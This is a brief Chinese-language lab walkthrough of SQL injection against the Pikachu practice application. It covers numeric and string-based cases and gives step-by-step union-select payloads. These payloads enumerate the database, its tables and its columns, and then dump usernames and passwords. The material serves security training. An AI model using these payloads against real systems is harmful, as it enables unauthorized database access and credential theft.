一.数字型注入
目录
在burp抓包
使用reprter注入
- 找列数id=2 order by 2# &submit=%E6%9F%A5%E8%AF%A2,如果猜测的列数大于select语句查询的结果的列数,会返回报错。
- 爆库,id=2 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2,上一步知道了有两列,浏览器的返回结果有用户名和邮箱。当前数据库是pikachu
- 爆表,id=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2
4.爆列,id=2 union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2
- 爆数据,id=2 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2
二.字符型注入
1.找列数,ccc’ order by 2#
2.爆库,ccc’ union select database(),2#
3.爆表,ccc' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' #
4.爆列,ccc' union select 'aaa', group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'pikachu' #
5.获取数据信息,ccc' union select username,password from pikachu.users #